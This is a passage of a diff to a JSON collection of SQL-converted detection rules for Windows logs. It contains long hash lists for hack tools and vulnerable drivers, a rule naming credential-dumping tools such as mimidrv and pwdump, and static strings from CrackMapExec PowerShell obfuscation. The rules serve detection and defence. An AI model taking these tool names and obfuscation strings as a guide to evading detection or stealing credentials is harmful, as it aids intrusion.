'%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], - 
"level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Use NTFS Short Name in Command Line", + "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unknown" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' 
ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c26ab1299adcd9a385b541ef1653728270aa23e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f36a47edfacd85e0c6d4d22133dd386aee4eec15%' ESCAPE '\\' OR Hashes LIKE '%SHA1=460008b1ffd31792a6deadfa6280fb2a30c8a5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=738b7918d85e5cb4395df9e3f6fc94ddad90e939%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=558aad879b6a47d94a968f39d0a4e3a3aaef1ef1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f5696fb352a3fbd14fb1a89ad21a71776027f9ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=693a2645c28fc3b248fda95179c36c3ac64f6fc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d25340ae8e92a6d29f599fef426a2bc1b5217299%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a21c84c6bf2e21d69fa06daaf19b4cc34b589347%' ESCAPE '\\' OR Hashes LIKE '%SHA1=82ba5513c33e056c3f54152c8555abf555f3e745%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d098600152e5ee6a8238d414d2a77a34da8afaaa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=64e4ac8b9ea2f050933b7ec76a55dd04e97773b4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc1e5fd826961d93b76abd161314cb3592c4436%' ESCAPE '\\' OR Hashes LIKE '%SHA1=90a76945fd2fa45fab2b7bcfdaf6563595f94891%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=b03b1996a40bfea72e4584b82f6b845c503a9748%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c771ea59f075170e952c393cfd6fc784b265027c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0918277fcdc64a9dc51c04324377b3468fa1269b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b09bcc042d60d2f4c0d08284818ed198cededa04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15df139494d2c40a645fb010908551185c27f3c5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=012db3a80faf1f7f727b538cbe5d94064e7159de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d04e5db5b6c848a29732bfd52029001f23c3da75%' ESCAPE '\\' OR Hashes LIKE '%SHA1=490109fa6739f114651f4199196c5121d1c6bdf2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d014b5edd6e19ce0e8395a64faedf49688ecb5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a87d6eac2d70a3fbc04e59412326b28001c179de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3f223581409492172a1e875f130f3485b90fbe5f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5db61d00a001fd493591dc919f69b14713889fc5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9923c8f1e565a05b3c738d283cf5c0ed61a0b90f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15d1a6a904c8409fb47a82aefa42f8c3c7d8c370%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9d07df024ec457168bf0be7e0009619f6ac4f13c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9a35ae9a1f95ce4be64adc604c80079173e4a676%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6bd965300f07012d1b651a9b8776028c45b149a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e83458c4a6383223759cd8024e60c17be4e7c85f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb3de54667548a5c9abf5d8fa47db4097fcee9f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c24dd75e4074041dbe03bf21f050c77d748b8e9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc55217b6043d819eadebd423ff07704ee103231%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e92817a8744ebc4e4fa5383cdce2b2977f01ecd4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc0e97adb756c0f30b41840a59b85218cbdd198f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=d0d39e1061f30946141b6ecfa0957f8cc3ddeb63%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6d349823bbb1f5b44bae91357895dba653c5861%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f42f28d164205d9f6dab9317c9fecad54c38d5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8183a341ba6c3ce1948bf9be49ab5320e0ee324d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb1ecad3d37bb980f908bf1a912415cff32e79e6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eb0d45aa6f537f5b2f90f3ad99013606eafcd162%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6053d258096bccb07cb0057d700fe05233ab1fbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=29a190727140f40cea9514a6420f5a195e36386b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a4b2c56c12799855162ca3b004b4b2078c6ecf77%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7667b72471689151e176baeba4e1cd9cd006a09a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7f7594ff084201c0d9fa2f4ef1626635b67bce5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=99201c9555e5faf6e8d82da793b148311f8aa4b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=947db58d6f36a8df9fa2a1057f3a7f653ccbc42e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403%' ESCAPE '\\' OR Hashes LIKE 